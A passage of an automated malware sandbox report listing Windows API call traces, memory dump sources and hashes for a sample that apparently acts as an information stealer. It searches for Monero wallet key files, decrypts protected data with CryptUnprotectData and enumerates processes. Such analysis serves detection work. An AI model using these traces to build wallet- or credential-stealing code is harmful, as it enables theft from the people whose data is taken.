                          • DeleteFileA.KERNEL32(00000000), ref: 00DE1DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DE1E20
                          • FindClose.KERNEL32(000000FF), ref: 00DE1E32
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 982d35051947c182fc0cb814baf96276e9814ac73be09fe8e8c82d211706fce8
                          • Instruction ID: c46180d4676962ebe346c86c4c92947ff804344e076e73af1ef532fc7e9f4c6d
                          • Opcode Fuzzy Hash: 982d35051947c182fc0cb814baf96276e9814ac73be09fe8e8c82d211706fce8
                          • Instruction Fuzzy Hash: 5612FBB191011C9ACB15FB64CC96AFE7378EF54340F4581A9A60E66091EF706F89CFB1
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E00C2E), ref: 00DEDE5E
                          • StrCmpCA.SHLWAPI(?,00E014C8), ref: 00DEDEAE
                          • StrCmpCA.SHLWAPI(?,00E014CC), ref: 00DEDEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEE3E0
                          • FindClose.KERNEL32(000000FF), ref: 00DEE3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: c997866e808f1e9350298de319211b44953c27662ce2057ae87e2b42c7fa0ad6
                          • Instruction ID: 776fec258f9195a11cb7f4d3ecbbe8e61c86cc9f27cef1966d55fcdfef305382
                          • Opcode Fuzzy Hash: c997866e808f1e9350298de319211b44953c27662ce2057ae87e2b42c7fa0ad6
                          • Instruction Fuzzy Hash: 03F1CEB191012C9ACB25FB64CC95AFE7338EF14340F8581E9A50E66095EF706B89CF71
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E014B0,00E00C2A), ref: 00DEDAEB
                          • StrCmpCA.SHLWAPI(?,00E014B4), ref: 00DEDB33
                          • StrCmpCA.SHLWAPI(?,00E014B8), ref: 00DEDB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEDDCC
                          • FindClose.KERNEL32(000000FF), ref: 00DEDDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 1933c7bd46935d337dd3ce7b6e7a626794bd32cd3bf5f6a4f7193d5396bc1aa3
                          • Instruction ID: ed6aa1e9f34d9809eb4dc882e21a7f5dad8716b5b7646231b2bfd773e1a64d4e
                          • Opcode Fuzzy Hash: 1933c7bd46935d337dd3ce7b6e7a626794bd32cd3bf5f6a4f7193d5396bc1aa3
                          • Instruction Fuzzy Hash: E19130B2A0020897CB14FB74DC969FD737DEF84340F41C568F95A96185EE74AB098BB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !s.o$0r\~$5l3Q$F)6$W^<>$t@/-$v^__$5.
                          • API String ID: 0-246233754
                          • Opcode ID: ef2226dae9872f0af3e0768114adeadfa5d38af6547aa0b07ffa4b9b0cea0b6d
                          • Instruction ID: 0244de85151dacd88051190ad7c311dc4077589e18ba077927f32a4b8c5a0a8c
                          • Opcode Fuzzy Hash: ef2226dae9872f0af3e0768114adeadfa5d38af6547aa0b07ffa4b9b0cea0b6d
                          • Instruction Fuzzy Hash: 6AB2E5F3A0C2149FE304AE2DEC8577AFBE5EF94720F16892DE6C4C3744EA3558448696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %{'N$6Vo$M|-$^'Qw$c"W}$g"W}$AOn$WEF
                          • API String ID: 0-2025990060
                          • Opcode ID: f887e53cf8930b29de8265286bf5fc4ad807128b7d15fb3e743cc22fd321ff6a
                          • Instruction ID: ed606837bdea2fbda8547ee2a97734c752745644315937f783625696c46df32e
                          • Opcode Fuzzy Hash: f887e53cf8930b29de8265286bf5fc4ad807128b7d15fb3e743cc22fd321ff6a
                          • Instruction Fuzzy Hash: 2AB2D3F360C2009FE3046E2DEC8567AFBE9EF94720F1A892DE6C4C7744E63598418697
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,00E005AF), ref: 00DF7BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00DF7BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00DF7C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00DF7C62
                          • LocalFree.KERNEL32(00000000), ref: 00DF7D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: b85ac848b95977d513241d4f7451bcadcf875c15a970c6b14db788865b816ff8
                          • Instruction ID: 5ff2c62651b2ca0c4b25a15d98b4051dc65737e443f8cb79dc67fbd5bd35ae9b
                          • Opcode Fuzzy Hash: b85ac848b95977d513241d4f7451bcadcf875c15a970c6b14db788865b816ff8
                          • Instruction Fuzzy Hash: 994107B194021CABDB24DB94DC99BFEB378EB48700F608199E60966181DB746B85CFB1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1v:$&.k$@JV~$ca42$k[=$uKu$|Z;o
                          • API String ID: 0-935616274
                          • Opcode ID: 63ed5de06395ce09c3400114f9685bd65f5e02e71b3d88c88685c93f157bcb0b
                          • Instruction ID: c27a0c3605f634a8e7f09b7b480f84622a7a703d05de1058d4b1af5a1b3a41ce
                          • Opcode Fuzzy Hash: 63ed5de06395ce09c3400114f9685bd65f5e02e71b3d88c88685c93f157bcb0b
                          • Instruction Fuzzy Hash: 5BB2D3F360C2009FE704AE2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3558058697
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E00D73), ref: 00DEE4A2
                          • StrCmpCA.SHLWAPI(?,00E014F8), ref: 00DEE4F2
                          • StrCmpCA.SHLWAPI(?,00E014FC), ref: 00DEE508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEEBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: c9ce18ac407776b0b88ef266df6fed489a8996fb92b6c907bd87355761a7e32c
                          • Instruction ID: c8a306f545c0627d4858a1e959737d8f06df58c655d5643fabb837b88901136b
                          • Opcode Fuzzy Hash: c9ce18ac407776b0b88ef266df6fed489a8996fb92b6c907bd87355761a7e32c
                          • Instruction Fuzzy Hash: 66123BB190011C9ADB24FB64DC96EFD7338EF54340F4181A9B60EA6095EE746B49CFB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: E}O$T8X$WS_l$jbW$t}C$wu9!
                          • API String ID: 0-381369359
                          • Opcode ID: e584ebbf0e6746a6f3db450c456a1b11f7c56d3ad1ccb238964cbdf54f1f160b
                          • Instruction ID: 3c76b90d65a908b1b72ec1301b98dcd7e45e864d85735a391a8a8a3908158447
                          • Opcode Fuzzy Hash: e584ebbf0e6746a6f3db450c456a1b11f7c56d3ad1ccb238964cbdf54f1f160b
                          • Instruction Fuzzy Hash: EEB208F3A0C2049FE3046E2DEC8567AFBE9EF94720F16493DEAC4C7744EA3558058696
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DEC871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DEC87C
                          • lstrcat.KERNEL32(?,00E00B46), ref: 00DEC943
                          • lstrcat.KERNEL32(?,00E00B47), ref: 00DEC957
                          • lstrcat.KERNEL32(?,00E00B4E), ref: 00DEC978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 678ea2258e4dc3d5d79d8ef6718ac41f7fae9b9fc9382a69a98cc8b0c5674293
                          • Instruction ID: 614d35b695d938dbc69f0a63a1204b22b2698c8fcd8e2a6fc2e67f161ef9cb87
                          • Opcode Fuzzy Hash: 678ea2258e4dc3d5d79d8ef6718ac41f7fae9b9fc9382a69a98cc8b0c5674293
                          • Instruction Fuzzy Hash: EC418674904209DFCB20DF94DD89BFEB7B8FB48304F1041A8E509A7280D7755A85CFA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00DE724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DE7254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00DE7281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00DE72A4
                          • LocalFree.KERNEL32(?), ref: 00DE72AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 8ce67f5b61f15a5dc51015d943f0cf7a96cca05d0b01a3d8dfc655d9421ed823
                          • Instruction ID: 33bb99ee4e886afd660ec7bde863d216a36ec9f997a22fbe7675c9317f4bfcb4
                          • Opcode Fuzzy Hash: 8ce67f5b61f15a5dc51015d943f0cf7a96cca05d0b01a3d8dfc655d9421ed823
                          • Instruction Fuzzy Hash: 62014075B40208FBDB20DFD4CD46F9E7778AB44700F204055FB05AB2C4CAB5AA008B64
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DF961E
                          • Process32First.KERNEL32(00E00ACA,00000128), ref: 00DF9632
                          • Process32Next.KERNEL32(00E00ACA,00000128), ref: 00DF9647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00DF965C
                          • CloseHandle.KERNEL32(00E00ACA), ref: 00DF967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: d97a2f1f9089e1cedc7d5c01da517f76a3983881a79d0338b1a0aed7cac6be17
                          • Instruction ID: ba0b75fec97ac6564f4284d2e4a8404dc84c3a960c19c98d8e339dd744ba51b4
                          • Opcode Fuzzy Hash: d97a2f1f9089e1cedc7d5c01da517f76a3983881a79d0338b1a0aed7cac6be17
                          • Instruction Fuzzy Hash: AD010C75A00208EBCB24DFA5D958BEDB7F8FB48300F108198EA46D7240DB759B44CF61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -1n?$KP\$jc>$p{;
                          • API String ID: 0-916700898
                          • Opcode ID: 76cc81a6f6edf74654f2f853c1f99f0aa51816b2cc193d779a5d2041841dc2e5
                          • Instruction ID: 7020b1aa863a7baa5abcc94552f88cc62b988c2ea873fbb72dcd43be542848b4
                          • Opcode Fuzzy Hash: 76cc81a6f6edf74654f2f853c1f99f0aa51816b2cc193d779a5d2041841dc2e5
                          • Instruction Fuzzy Hash: 7DB216F3A0C204AFE3046E2DEC4567ABBE9EFD4720F1A493DE6C4C3744E67598058696
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E005B7), ref: 00DF86CA
                          • Process32First.KERNEL32(?,00000128), ref: 00DF86DE
                          • Process32Next.KERNEL32(?,00000128), ref: 00DF86F3
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • CloseHandle.KERNEL32(?), ref: 00DF8761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 13de2375701789094fd049e58dbb093793072892d376110ca8717b0f2d9eea34
                          • Instruction ID: 742cccd4e8f89916b3199d2cc1143c6c113ad21825a019b413c246458f40adfc
                          • Opcode Fuzzy Hash: 13de2375701789094fd049e58dbb093793072892d376110ca8717b0f2d9eea34
                          • Instruction Fuzzy Hash: 5F3127B190121CABCB24EF54CC45FEEB778EB49740F1181A9E60EA6190DF746A45CFB1
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00DE5184,40000001,00000000,00000000,?,00DE5184), ref: 00DF8EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
